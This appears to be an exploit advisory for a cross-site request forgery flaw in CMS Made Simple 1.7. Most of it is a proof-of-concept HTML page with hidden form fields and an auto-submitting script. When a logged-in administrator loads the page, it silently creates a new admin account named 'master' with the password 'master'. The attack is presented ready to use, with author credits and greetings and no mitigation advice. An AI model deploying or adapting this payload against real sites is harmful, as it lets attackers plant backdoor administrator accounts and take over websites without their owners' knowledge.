CMS Made Simple 1.7 Cross Site Request Forgery

` =======================================================================  
  
CMS Made Simple 1.7 CSRF Vulnerability  
  
=======================================================================  
  
  
  
  
  
# Vulnerability found in- Admin module  
  
# email [email protected]  
  
# company aksitservices  
  
# Credit by Pratul Agrawal  
  
# Software CMS Made Simple 1.7  
  
# Category CMS / Portals  
  
# Site p4ge http://server/demo/2/10/CMS_Made_Simple  
  
# Plateform php  
  
# Greetz to Gaurav, Prateek, Vivek, Sanjay, Sourabh, Varun, sameer (My Web Team)  
  
  
  
# Proof of concept #  
  
Targeted URL: http://sever/demo/2/10/CMS_Made_Simple  
  
  
Script to Add admin user through Cross Site request forgery  
  
. ................................................................................................................  
  
<html>  
  
<body>  
  
<form name="csrf" action="http://server/cmsmadesimple/admin/adduser.php" method="post">  
  
<input type=hidden name="sp_" value="64becc90">  
  
<input type=hidden name="user" value="master">  
  
<input type=hidden name="password" value="master">  
  
<input type=hidden name="passwordagain" value="master">  
  
<input type=hidden name="firstname" value="12345">  
  
<input type=hidden name="lastname" value="12345">  
  
<input type=hidden name="email" value="[email protected]">  
  
<input type=hidden name="active" value="on">  
  
<input type=hidden name="groups" value="1">  
  
<input type=hidden name="g1" value="1">  
  
<input type=hidden name="adduser" value="true">  
  
  
</form>  
  
<script>  
  
document.csrf.submit();  
  
</script>  
  
</body>  
  
</html>  
  
. ..................................................................................................................  
  
  
  
After execution just refresh the page and we can see that the admin user added automatically.  
  
  
#If you have any questions, comments, or concerns, feel free to contact me.  
  
`